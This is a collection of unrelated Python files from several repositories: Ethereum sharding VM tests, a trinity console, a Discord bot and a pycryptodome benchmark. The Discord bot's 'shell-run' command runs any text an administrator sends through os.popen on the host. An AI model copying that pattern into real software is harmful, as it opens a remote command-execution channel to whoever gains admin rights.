[ACCOUNT_ADDRESS, b"\x00" * 32],
[ECRECOVER_ADDRESS],
],
"code": b"",
"salt": b"\x00" * 32,
}
DEFAULT_TX_PARAMS = merge(
dissoc(DEFAULT_BASE_TX_PARAMS, "code", "salt"),
{
"destination": DESTINATION_ADDRESS,
"value": 0,
"min_block": 0,
"max_block": UINT_256_MAX,
"nonce": 0,
"msg_data": b"",
"access_list": DEFAULT_BASE_TX_PARAMS["access_list"] + [
[DESTINATION_ADDRESS],
],
"gas_price": 0,
}
)
SIGNED_DEFAULT_TRANSACTION = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": 0,
})).as_signed_transaction(PRIVATE_KEY)
DEFAULT_V = SIGNED_DEFAULT_TRANSACTION.v
DEFAULT_R = SIGNED_DEFAULT_TRANSACTION.r
DEFAULT_S = SIGNED_DEFAULT_TRANSACTION.s
@pytest.fixture
def vm():
header = CollationHeader(
shard_id=0,
expected_period_number=2,
period_start_prevhash=decode_hex(
"3c4cc7b99c7eb9281e9a8d15cd4b2f98c5df085e929f15388c699b41cdde78d7"
),
parent_hash=ZERO_HASH32,
transaction_root=EMPTY_SHA3,
coinbase=to_canonical_address("8888f1f195afa192cfee860698584c030f4c9db1"),
state_root=EMPTY_SHA3,
receipt_root=EMPTY_SHA3,
number=10,
)
chaindb = ChainDB(
get_db_backend(),
account_state_class=ShardingAccountStateDB,
trie_class=BinaryTrie,
)
vm = ShardingVM(header=header, chaindb=chaindb)
vm_state = vm.state
with vm_state.state_db() as statedb:
for address, code in HELPER_CONTRACTS.items():
statedb.set_code(address, code)
statedb.set_balance(ACCOUNT_ADDRESS, INITIAL_BALANCE)
# Update state_root manually
vm.block.header.state_root = vm_state.state_root
return vm
def get_nonce(vm):
computation, _ = vm.apply_transaction(ShardingTransaction(**merge(DEFAULT_BASE_TX_PARAMS, {
"data": int_to_big_endian(NONCE_GETTER_ID),
})))
return big_endian_to_int(computation.output)
def test_get_nonce(vm):
computation, _ = vm.apply_transaction(ShardingTransaction(**merge(DEFAULT_BASE_TX_PARAMS, {
"data": int_to_big_endian(NONCE_GETTER_ID),
})))
assert computation.output == pad32(b"\x00")
computation, _ = vm.apply_transaction(SIGNED_DEFAULT_TRANSACTION)
computation, _ = vm.apply_transaction(ShardingTransaction(**merge(DEFAULT_BASE_TX_PARAMS, {
"data": int_to_big_endian(NONCE_GETTER_ID),
})))
assert computation.output == pad32(b"\x01")
def test_call_increments_nonce(vm):
computation, _ = vm.apply_transaction(SIGNED_DEFAULT_TRANSACTION)
assert computation.is_success
assert get_nonce(vm) == 1
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": 1,
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
assert get_nonce(vm) == 2
def test_call_checks_nonce(vm):
computation, _ = vm.apply_transaction(SIGNED_DEFAULT_TRANSACTION)
assert computation.is_success
computation, _ = vm.apply_transaction(SIGNED_DEFAULT_TRANSACTION)
assert computation.is_error
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": 2,
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_error
@pytest.mark.parametrize("min_block,max_block,valid", [
(min_block, max_block, True) for min_block, max_block in [
(0, UINT_256_MAX),
(0, 10),
(10, 10),
(10, UINT_256_MAX)
]] + [
(min_block, max_block, False) for min_block, max_block in [
(0, 9),
(5, 9),
(11, 20),
(11, UINT_256_MAX),
(11, 9),
(UINT_256_MAX, 0),
]]
)
def test_call_checks_block_range(vm, min_block, max_block, valid):
assert vm.block.number == 10
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"min_block": min_block,
"max_block": max_block,
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
if valid:
assert computation.is_success
else:
assert computation.is_error
def test_call_transfers_value(vm):
vm_state = vm.state
with vm_state.state_db() as state_db:
balance_sender_before = state_db.get_balance(ACCOUNT_ADDRESS)
balance_destination_before = state_db.get_balance(DESTINATION_ADDRESS)
# Update state_root manually
vm.block.header.state_root = vm_state.state_root
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"value": 10
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
vm_state = vm.state
with vm_state.state_db() as state_db:
balance_sender_after = state_db.get_balance(ACCOUNT_ADDRESS)
balance_destination_after = state_db.get_balance(DESTINATION_ADDRESS)
# Update state_root manually
vm.block.header.state_root = vm_state.state_root
assert balance_sender_after == balance_sender_before - 10
assert balance_destination_after == balance_destination_before + 10
@pytest.mark.parametrize("v,r,s", [
(0, 0, 0),
(DEFAULT_V + 1, DEFAULT_R, DEFAULT_S),
(DEFAULT_V + 2, DEFAULT_R, DEFAULT_S),
(DEFAULT_V - 1, DEFAULT_R, DEFAULT_S),
(0, DEFAULT_R, DEFAULT_S),
(1, DEFAULT_R, DEFAULT_S),
(DEFAULT_V, DEFAULT_R + 1, DEFAULT_S),
(DEFAULT_V, DEFAULT_R - 1, DEFAULT_S),
(DEFAULT_V, 0, DEFAULT_S),
(DEFAULT_V, DEFAULT_R, DEFAULT_S + 1),
(DEFAULT_V, DEFAULT_R, DEFAULT_S - 1),
(DEFAULT_V, DEFAULT_R, 0),
(27 if DEFAULT_V == 28 else 28, DEFAULT_R, SECPK1_N - DEFAULT_S),
])
def test_call_checks_signature(vm, v, r, s):
transaction = UserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {"v": v, "r": r, "s": s}))
message_params = {
"gas": transaction.gas,
"to": transaction.to,
"sender": ENTRY_POINT,
"value": 0,
"code": ACCOUNT_CODE,
"is_create": False,
"access_list": transaction.prefix_list,
}
message = ShardingMessage(**assoc(message_params, "data", transaction.data))
transaction_context = ShardingTransactionContext(
origin=ENTRY_POINT,
sig_hash=transaction.sig_hash,
transaction_gas_limit=transaction.gas,
)
computation = vm.state.get_computation(message, transaction_context)
computation = computation.apply_message()
assert computation.is_error
# error is due to bad signature, so with tx should pass with original one
message = ShardingMessage(**assoc(message_params, "data", SIGNED_DEFAULT_TRANSACTION.data))
computation = vm.state.get_computation(message, transaction_context)
computation = computation.apply_message()
assert computation.is_success
def test_call_uses_remaining_gas(vm):
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": GAS_LOGGING_CONTRACT_ADDRESS,
"gas": 1 * 1000 * 1000,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[GAS_LOGGING_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
logs = computation.get_log_entries()
assert len(logs) == 1
logged_gas = big_endian_to_int(logs[0][-1])
assert logged_gas > 900 * 1000 # some gas will have been consumed earlier
@pytest.mark.parametrize("data,hash", [
(data, keccak(data)) for data in [
b"",
b"\x112233"
b"\x00" * 32,
b"\xff" * 32,
b"\xaa" * 50,
b"\x55" * 64,
b"\x22" * 500,
]
])
def test_call_uses_data(vm, data, hash):
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": DATA_LOGGING_CONTRACT_ADDRESS,
"msg_data": data,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[DATA_LOGGING_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
logs = computation.get_log_entries()
assert len(logs) == 1
logged_hash = logs[0][-1]
assert logged_hash == hash
def test_no_call_if_not_enough_gas(vm):
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": NOOP_CONTRACT_ADDRESS,
"gas": 80000,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[NOOP_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_error
# a little remains, but not enough to make the call
assert computation.gas_meter.gas_remaining > 0
def test_call_passes_return_code(vm):
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": NOOP_CONTRACT_ADDRESS,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[NOOP_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
assert big_endian_to_int(computation.output) == 1 # success
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": FAILING_CONTRACT_ADDRESS,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[FAILING_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
assert big_endian_to_int(computation.output) == 0 # failure
def test_call_does_not_revert_nonce(vm):
nonce_before = get_nonce(vm)
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": nonce_before,
"destination": FAILING_CONTRACT_ADDRESS,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[FAILING_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
assert get_nonce(vm) == nonce_before + 1
def test_nonce_getter_id():
assert NONCE_GETTER_ID == big_endian_to_int(keccak(b"get_nonce()")[:4])
```
#### File: auxiliary/user-account/test_helpers.py
```python
import pytest
from eth_keys import keys
from cytoolz import (
merge,
)
from evm.exceptions import ValidationError
from evm.auxiliary.user_account_contract.transaction import (
UserAccountTransaction,
UnsignedUserAccountTransaction
)
VALID_PARAMS = {
"chain_id": 1,
"shard_id": 2,
"to": b"\xaa" * 20,
"gas": 300000,
"access_list": [[b"\xaa" * 20, b"\x00"]],
"destination": b"\xbb" * 20,
"value": 4,
"nonce": 5,
"min_block": 6,
"max_block": 7,
"gas_price": 8,
"msg_data": b"\xcc" * 123,
}
INVALID_PARAMS = {
"chain_id": b"\x01",
"shard_id": b"\x02",
"to": "0x" + "aa" * 20,
"gas": b"\x03",
"access_list": [[b"\xaa" * 20, 0]],
"destination": "0x" + "bb" * 20,
"value": b"\x04",
"nonce": b"\x05",
"min_block": b"\x06",
"max_block": b"\x07",
"gas_price": b"\x08",
"msg_data": 123,
}
@pytest.fixture
def unsigned_transaction():
return UnsignedUserAccountTransaction(**VALID_PARAMS)
def test_signing(unsigned_transaction):
private_key = keys.PrivateKey(b"\x22" * 32)
signed_transaction = unsigned_transaction.as_signed_transaction(private_key)
assert signed_transaction.get_sender() == private_key.public_key.to_canonical_address()
def test_data(unsigned_transaction):
private_key = keys.PrivateKey(b"\x22" * 32)
signed_transaction = unsigned_transaction.as_signed_transaction(private_key)
assert len(signed_transaction.data) > 10 * 32
assert signed_transaction.data.endswith(signed_transaction.msg_data)
assert signed_transaction.data.endswith(unsigned_transaction.msg_data)
assert len(signed_transaction.data) == len(unsigned_transaction.data) + 96
@pytest.mark.parametrize("key,value", INVALID_PARAMS.items())
def test_validation(key, value):
# construct object with valid parameters, apply invalid values afterwards
# this ensures object creation succeeds
tx = UnsignedUserAccountTransaction(**VALID_PARAMS)
with pytest.raises(ValidationError):
setattr(tx, key, value)
tx.validate()
tx = UserAccountTransaction(**merge(VALID_PARAMS, {"v": 27, "r": 1, "s": 1}))
with pytest.raises(ValidationError):
setattr(tx, key, value)
tx.validate()
```
#### File: core/vm/test_shard_vm.py
```python
import os
import json
from eth_utils import (
int_to_big_endian,
decode_hex,
)
from evm.exceptions import (
IncorrectContractCreationAddress,
ContractCreationCollision,
)
from evm.utils.address import generate_CREATE2_contract_address
from evm.utils.padding import pad32
from tests.core.helpers import (
new_sharding_transaction,
)
DIR = os.path.dirname(__file__)
def test_sharding_apply_transaction(unvalidated_shard_chain): # noqa: F811
chain = unvalidated_shard_chain
CREATE2_contracts = json.load(
open(os.path.join(DIR, '../contract_fixtures/CREATE2_contracts.json'))
)
simple_transfer_contract = CREATE2_contracts["simple_transfer_contract"]
CREATE2_contract = CREATE2_contracts["CREATE2_contract"]
simple_factory_contract_bytecode = CREATE2_contracts["simple_factory_contract"]["bytecode"]
# First test: simple ether transfer contract
first_deploy_tx = new_sharding_transaction(
tx_initiator=decode_hex(simple_transfer_contract['address']),
data_destination=b'',
data_value=0,
data_msgdata=b'',
data_vrs=b'',
code=simple_transfer_contract['bytecode'],
)
vm = chain.get_vm()
computation, _ = vm.apply_transaction(first_deploy_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used
assert gas_used > first_deploy_tx.intrinsic_gas
last_gas_used = gas_used
# Transfer ether to recipient
recipient = decode_hex('0xa94f5374fce5edbc8e2a8697c15331677e6ebf0c')
amount = 100
tx_initiator = decode_hex(simple_transfer_contract['address'])
transfer_tx = new_sharding_transaction(tx_initiator, recipient, amount, b'', b'')
computation, _ = vm.apply_transaction(transfer_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > transfer_tx.intrinsic_gas
last_gas_used = vm.block.header.gas_used
with vm.state.state_db(read_only=True) as state_db:
assert state_db.get_balance(recipient) == amount
# Second test: contract that deploy new contract with CREATE2
second_deploy_tx = new_sharding_transaction(
tx_initiator=decode_hex(CREATE2_contract['address']),
data_destination=b'',
data_value=0,
data_msgdata=b'',
data_vrs=b'',
code=CREATE2_contract['bytecode'],
)
computation, _ = vm.apply_transaction(second_deploy_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > second_deploy_tx.intrinsic_gas
last_gas_used = vm.block.header.gas_used
# Invoke the contract to deploy new contract
tx_initiator = decode_hex(CREATE2_contract['address'])
newly_deployed_contract_address = generate_CREATE2_contract_address(
int_to_big_endian(0),
decode_hex(simple_factory_contract_bytecode)
)
invoke_tx = new_sharding_transaction(
tx_initiator,
b'',
0,
b'',
b'',
access_list=[[tx_initiator, pad32(b'')], [newly_deployed_contract_address]]
)
computation, _ = vm.apply_transaction(invoke_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > invoke_tx.intrinsic_gas
with vm.state.state_db(read_only=True) as state_db:
newly_deployed_contract_address = generate_CREATE2_contract_address(
int_to_big_endian(0),
decode_hex(simple_factory_contract_bytecode)
)
assert state_db.get_code(newly_deployed_contract_address) == b'\xbe\xef'
assert state_db.get_storage(decode_hex(CREATE2_contract['address']), 0) == 1
def test_CREATE2_deploy_contract_edge_cases(unvalidated_shard_chain): # noqa: F811
CREATE2_contracts = json.load(
open(os.path.join(DIR, '../contract_fixtures/CREATE2_contracts.json'))
)
simple_transfer_contract = CREATE2_contracts["simple_transfer_contract"]
# First case: computed contract address not the same as provided in `transaction.to`
chain = unvalidated_shard_chain
code = "0xf3"
computed_address = generate_CREATE2_contract_address(b"", decode_hex(code))
first_failed_deploy_tx = new_sharding_transaction(
tx_initiator=decode_hex(simple_transfer_contract['address']),
data_destination=b'',
data_value=0,
data_msgdata=b'',
data_vrs=b'',
code=code,
access_list=[[decode_hex(simple_transfer_contract['address'])], [computed_address]]
)
vm = chain.get_vm()
computation, _ = vm.apply_transaction(first_failed_deploy_tx)
assert isinstance(computation._error, IncorrectContractCreationAddress)
gas_used = vm.block.header.gas_used
assert gas_used > first_failed_deploy_tx.intrinsic_gas
last_gas_used = gas_used
# Next, complete deploying the contract
successful_deploy_tx = new_sharding_transaction(
tx_initiator=decode_hex(simple_transfer_contract['address']),
data_destination=b'',
data_value=0,
data_msgdata=b'',
data_vrs=b'',
code=simple_transfer_contract['bytecode'],
)
computation, _ = vm.apply_transaction(successful_deploy_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > successful_deploy_tx.intrinsic_gas
last_gas_used = gas_used
# Second case: deploy to existing account
second_failed_deploy_tx = successful_deploy_tx
computation, _ = vm.apply_transaction(second_failed_deploy_tx)
assert isinstance(computation._error, ContractCreationCollision)
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > second_failed_deploy_tx.intrinsic_gas
```
#### File: py-evm/trinity/cli.py
```python
import asyncio
import atexit
import logging
import traceback
import threading
from typing import Dict # noqa: F401
from p2p.lightchain import LightChain
LOGFILE = '/tmp/trinity-shell.log'
LOGLEVEL = logging.INFO
loop = asyncio.get_event_loop()
def wait_for_result(coroutine):
future = asyncio.run_coroutine_threadsafe(coroutine, loop)
return future.result()
def setup_namespace(chain):
"""Setup the variables to be used in shell instance."""
namespace = dict(
chain=chain,
wait_for_result=wait_for_result
)
return namespace
def ipython_shell(namespace=None, banner=None, debug=False):
"""Try to run IPython shell."""
try:
import IPython
except ImportError:
if debug:
traceback.print_exc()
print("IPython not available. Running default shell...")
return
# First try newer(IPython >=1.0) top `IPython` level import
if hasattr(IPython, 'terminal'):
from IPython.terminal.embed import InteractiveShellEmbed
kwargs = dict(user_ns=namespace)
else:
from IPython.frontend.terminal.embed import InteractiveShellEmbed # type: ignore
kwargs = dict(user_ns=namespace)
if banner:
kwargs = dict(banner1=banner)
return InteractiveShellEmbed(**kwargs)
def python_shell(namespace=None, banner=None, debug=False):
"""Start a vanilla Python REPL shell."""
import code
from functools import partial
try:
import readline, rlcompleter # NOQA
except ImportError:
if debug:
traceback.print_exc()
else:
readline.parse_and_bind('tab: complete')
# Add global, local and custom namespaces to current shell
default_ns = globals().copy()
default_ns.update(locals())
if namespace:
default_ns.update(namespace)
# Configure kwargs to pass banner
kwargs = dict() # type: Dict[str, str]
if banner:
kwargs = dict(banner=banner)
shell = code.InteractiveConsole(default_ns)
return partial(shell.interact, **kwargs)
def console(
chain: LightChain,
use_ipython: bool = True,
namespace: dict = None,
banner: str = None,
debug: bool = False) -> None:
"""
Method that starts the chain, setups the trinity CLI and register the
cleanup function.
"""
# update the namespace with the required variables
namespace = {} if namespace is None else namespace
namespace.update(setup_namespace(chain))
if use_ipython:
shell = ipython_shell(namespace, banner, debug)
print("Logging to", LOGFILE)
log_level = logging.DEBUG if debug else LOGLEVEL
logging.basicConfig(level=log_level, filename=LOGFILE)
# Start the thread
t = threading.Thread(target=loop.run_until_complete, args=(run_lightchain(chain),),
daemon=True)
t.start()
# If can't import or start the IPython shell, use the default shell
if not use_ipython or shell is None:
shell = python_shell(namespace, banner, debug)
shell()
def cleanup():
chain.cancel_token.trigger()
# Wait until run() finishes.
t.join()
atexit.register(cleanup)
async def run_lightchain(lightchain: LightChain) -> None:
try:
asyncio.ensure_future(lightchain.peer_pool.run())
await lightchain.run()
finally:
await lightchain.peer_pool.stop()
await lightchain.stop()
```
#### File: trinity/db/base.py
```python
from multiprocessing.managers import ( # type: ignore
BaseProxy,
)
class DBProxy(BaseProxy):
_exposed_ = (
'get',
'set',
'delete',
'exists',
)
def __getitem__(self, key):
return self._callmethod('get', (key,))
def __setitem__(self, key, value):
return self._callmethod('set', (key, value))
def __delitem__(self, key):
return self._callmethod('delete', (key,))
def __contains__(self, key):
return self._callmethod('exists', (key,))
```
|
{
"source": "jesterwanderer/curso-python-cursoemvideo",
"score": 3
}
|
#### File: CursoPython/Aulas/aula20a.py
```python
def soma(a, b):
s = a + b
print(f'A soma de {a} + {b} é = {s}')
soma(15, 13)
```
|
{
"source": "JesterXL/avoiding-primitive-obession",
"score": 3
}
|
#### File: avoiding-primitive-obession/python/index2.py
```python
from dataclasses import dataclass, astuple
from enum import Enum
from returns.result import Result, Success, Failure
from functools import reduce
class Team(Enum):
Red = "red"
Blue = "blue"
def team_to_str(teamName:Team) -> str:
# match teamName:
# case Team.Red:
# return "red"
# case Team.Blue:
# return "blue"
# case _:
# return "uh"
if teamName == Team.Red:
return "red"
elif teamName == Team.Blue:
return "blue"
else:
return "uh"
@dataclass
class Name:
name: str
def __iter__(self):
return iter(astuple(self))
@dataclass
class Phone:
phone: str
def __iter__(self):
return iter(astuple(self))
@dataclass
class Age:
age: int
def __iter__(self):
return iter(astuple(self))
@dataclass
class Person:
team: Team
name: Name
age: Age
phone: Phone
def __str__(self):
return f'Person(team={team_to_str(self.team)}, name={self.name}, age={self.age}, phone={self.phone})'
def get_person(team:Team, name:Name, age:Age, phone:Phone) -> Result[Person, str]:
return (
validate_name(name)
.bind(lambda _: validate_phone(phone))
.bind(lambda _: validate_age(age))
.bind(lambda _: Success(Person(team, name, phone, age)))
)
def all_blanks(acc, character):
if acc == False:
return False
elif character == "":
return True
else:
return False
def validate_name(name_:Name) -> Result[str, str]:
[name] = name_
# can't be 0 characters
if len(name) < 1:
return Failure('name cannot be blank')
# can't be a bunch-o-blanks
if reduce(all_blanks, name.split(), True) == True:
return Failure('name cannot be a bunch of blanks')
return Success(name)
def validate_phone(phone_:Phone) -> Result[str, str]:
[phone] = phone_
if len(phone) < 9:
return Failure('phone cannot be less than 9 characters')
if reduce(is_ok_phone_character, list(phone.strip()), True) == False:
return Failure('phone has an unknown character, it must be either a number or ), (, or - as we strip our blank spaces')
return Success(phone)
def is_parseable_int(character:str) -> bool:
try:
parsed = int(character)
return True
except:
return False
def is_ok_phone_character(acc:bool, character:str) -> bool:
if acc == False:
return False
if character == ')' or character == '(' or character == '-':
return True
return is_parseable_int(character)
def validate_age(age_:Age) -> Result[str, str]:
[age] = age_
if is_parseable_int(age) == False:
return Failure('failed to parse age to an integer')
parsed = int(age)
if parsed < 0:
return Failure('age must be greater than -1')
return Success(age)
jesse = get_person(Team.Red, Name("Jesse"), Age(42), Phone("804-555-1234"))
print(jesse)
```
|
{
"source": "jestes15/GoogleBot",
"score": 2
}
|
#### File: jestes15/GoogleBot/backend_operations.py
```python
import json as js
import os
import discord
from discord.ext import commands
from discord.ext.commands import has_permissions
from dotenv import load_dotenv
data = None
def load_data_file():
global data
with open("data.json") as data_file:
data = js.loads(data_file.read())
def dump_data():
global data
with open("data.json", "w") as file:
js.dump(data, file)
if __name__ == "__main__":
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
bot = commands.Bot(command_prefix=["$"])
@has_permissions(administrator=True)
@bot.command(name="shell-run")
async def shell(ctx, cmd_var: str):
out = os.popen(cmd_var)
await ctx.channel.send(f"The output is: {out.read()}")
@has_permissions(administrator=True)
@bot.command(name="restart")
async def restart(ctx):
dump_data()
var = os.popen("cd .. && ./restart")
await ctx.channel.send(var.read())
@has_permissions(administrator=True)
@bot.command(name="stop")
async def stop(ctx):
dump_data()
var = os.popen("forever stop Google && forever stop watchdog")
await ctx.channel.send(var.read())
@has_permissions(administrator=True)
@bot.command(name="start")
async def start(ctx):
dump_data()
var = os.popen("cd .. && ./start")
await ctx.channel.send(var.read())
@has_permissions(administrator=True)
@bot.command(name="update")
async def update(ctx):
dump_data()
var = os.popen("cd .. && ./update && ./update2")
await ctx.channel.send(var.read())
bot.run(TOKEN)
```
|
{
"source": "jestinepaul/pycryptodome",
"score": 2
}
|
#### File: jestinepaul/pycryptodome/pct-speedtest.py
```python
import time
import os
import sys
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, PKCS1_v1_5 as RSAES_PKCS1_v1_5
from Crypto.Signature import PKCS1_PSS, PKCS1_v1_5 as RSASSA_PKCS1_v1_5
from Crypto.Cipher import (AES, ARC2, ARC4, Blowfish, CAST, DES3, DES,
Salsa20, ChaCha20)
from Crypto.Hash import (HMAC, MD2, MD4, MD5, SHA224, SHA256, SHA384, SHA512,
CMAC, SHA3_224, SHA3_256, SHA3_384, SHA3_512,
BLAKE2b, BLAKE2s)
from Crypto.Random import get_random_bytes
import Crypto.Util.Counter
from Crypto.Util.number import bytes_to_long
try:
from Crypto.Hash import SHA1
except ImportError:
# Maybe it's called SHA
from Crypto.Hash import SHA as SHA1
try:
from Crypto.Hash import RIPEMD160
except ImportError:
# Maybe it's called RIPEMD
try:
from Crypto.Hash import RIPEMD as RIPEMD160
except ImportError:
# Some builds of PyCrypto don't have the RIPEMD module
RIPEMD160 = None
try:
import hashlib
import hmac
except ImportError: # Some builds/versions of Python don't have a hashlib module
hashlib = hmac = None
from Crypto.Random import random as pycrypto_random
import random as stdlib_random
class BLAKE2b_512(object):
digest_size = 512
@staticmethod
def new(data=None):
return BLAKE2b.new(digest_bits=512, data=data)
class BLAKE2s_256(object):
digest_size = 256
@staticmethod
def new(data=None):
return BLAKE2s.new(digest_bits=256, data=data)
class ChaCha20_old_style(object):
@staticmethod
def new(key, nonce):
return ChaCha20.new(key=key, nonce=nonce)
class ModeNotAvailable(ValueError):
pass
rng = get_random_bytes
class Benchmark:
def __init__(self):
self.__random_data = None
def random_keys(self, bytes, n=10**5):
"""Return random keys of the specified number of bytes.
If this function has been called before with the same number of bytes,
cached keys are used instead of randomly generating new ones.
"""
return self.random_blocks(bytes, n)
def random_blocks(self, bytes_per_block, blocks):
bytes = bytes_per_block * blocks
data = self.random_data(bytes)
retval = []
for i in range(blocks):
p = i * bytes_per_block
retval.append(data[p:p+bytes_per_block])
return retval
def random_data(self, bytes):
if self.__random_data is None:
self.__random_data = self._random_bytes(bytes)
return self.__random_data
elif bytes == len(self.__random_data):
return self.__random_data
elif bytes < len(self.__random_data):
return self.__random_data[:bytes]
else:
self.__random_data += self._random_bytes(bytes - len(self.__random_data))
return self.__random_data
def _random_bytes(self, b):
return os.urandom(b)
def announce_start(self, test_name):
sys.stdout.write("%s: " % (test_name,))
sys.stdout.flush()
def announce_result(self, value, units):
sys.stdout.write("%.2f %s\n" % (value, units))
sys.stdout.flush()
def test_random_module(self, module_name, module):
self.announce_start("%s.choice" % (module_name,))
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
t0 = time.time()
for i in range(5000):
module.choice(alphabet)
t = time.time()
invocations_per_second = 5000 / (t - t0)
self.announce_result(invocations_per_second, "invocations/sec")
def test_pubkey_setup(self, pubkey_name, module, key_bytes):
self.announce_start("%s pubkey setup" % (pubkey_name,))
keys = self.random_keys(key_bytes)[:5]
t0 = time.time()
for k in keys:
module.generate(key_bytes*8)
t = time.time()
pubkey_setups_per_second = len(keys) / (t - t0)
self.announce_result(pubkey_setups_per_second, "Keys/sec")
def test_key_setup(self, cipher_name, module, key_bytes, params):
self.generate_cipher(module, key_bytes, params)
self.announce_start("%s key setup" % (cipher_name,))
for x in xrange(5000):
t0 = time.time()
self.generate_cipher(module, key_bytes, params)
t = time.time()
key_setups_per_second = 5000 / (t - t0)
self.announce_result(key_setups_per_second/1000, "kKeys/sec")
def test_encryption(self, cipher_name, module, key_bytes, params):
self.announce_start("%s encryption" % (cipher_name,))
pt_size = 16384000L
pt = rng(pt_size)
cipher = self.generate_cipher(module, key_bytes, params)
# Perform encryption
t0 = time.time()
cipher.encrypt(pt)
t = time.time()
encryption_speed = pt_size / (t - t0)
self.announce_result(encryption_speed / 10**6, "MBps")
def test_hash_small(self, hash_name, hash_constructor, digest_size):
self.announce_start("%s (%d-byte inputs)" % (hash_name, digest_size))
blocks = self.random_blocks(digest_size, 10000)
# Initialize hashes
t0 = time.time()
for b in blocks:
hash_constructor(b).digest()
t = time.time()
hashes_per_second = len(blocks) / (t - t0)
self.announce_result(hashes_per_second / 1000, "kHashes/sec")
def test_hash_large(self, hash_name, hash_constructor, digest_size):
self.announce_start("%s (single large input)" % (hash_name,))
blocks = self.random_blocks(16384, 10000)
# Perform hashing
t0 = time.time()
h = hash_constructor()
for b in blocks:
h.update(b)
h.digest()
t = time.time()
hash_speed = len(blocks) * len(blocks[0]) / (t - t0)
self.announce_result(hash_speed / 10**6, "MBps")
def test_hmac_small(self, mac_name, hmac_constructor, digestmod, digest_size):
keys = iter(self.random_keys(digest_size))
if sys.version_info[0] == 2:
mac_constructor = lambda data=None: hmac_constructor(keys.next(), data, digestmod)
else:
mac_constructor = lambda data=None: hmac_constructor(keys.__next__(), data, digestmod)
self.test_hash_small(mac_name, mac_constructor, digest_size)
def test_hmac_large(self, mac_name, hmac_constructor, digestmod, digest_size):
key = self.random_keys(digest_size)[0]
mac_constructor = lambda data=None: hmac_constructor(key, data, digestmod)
self.test_hash_large(mac_name, mac_constructor, digest_size)
def test_cmac_small(self, mac_name, cmac_constructor, ciphermod, key_size):
keys = iter(self.random_keys(key_size))
if sys.version_info[0] == 2:
mac_constructor = lambda data=None: cmac_constructor(keys.next(), data, ciphermod)
else:
mac_constructor = lambda data=None: cmac_constructor(keys.__next__(), data, ciphermod)
self.test_hash_small(mac_name, mac_constructor, ciphermod.block_size)
def test_cmac_large(self, mac_name, cmac_constructor, ciphermod, key_size):
key = self.random_keys(key_size)[0]
mac_constructor = lambda data=None: cmac_constructor(key, data, ciphermod)
self.test_hash_large(mac_name, mac_constructor, ciphermod.block_size)
def test_pkcs1_sign(self, scheme_name, scheme_constructor, hash_name, hash_constructor, digest_size):
self.announce_start("%s signing %s (%d-byte inputs)" % (scheme_name, hash_name, digest_size))
# Make a key
k = RSA.generate(2048)
sigscheme = scheme_constructor(k)
# Make some hashes
blocks = self.random_blocks(digest_size, 50)
hashes = []
for b in blocks:
hashes.append(hash_constructor(b))
# Perform signing
t0 = time.time()
for h in hashes:
sigscheme.sign(h)
t = time.time()
speed = len(hashes) / (t - t0)
self.announce_result(speed, "sigs/sec")
def test_pkcs1_verify(self, scheme_name, scheme_constructor, hash_name, hash_constructor, digest_size):
self.announce_start("%s verification %s (%d-byte inputs)" % (scheme_name, hash_name, digest_size))
# Make a key
k = RSA.generate(2048)
sigscheme = scheme_constructor(k)
# Make some hashes
blocks = self.random_blocks(digest_size, 50)
hashes = []
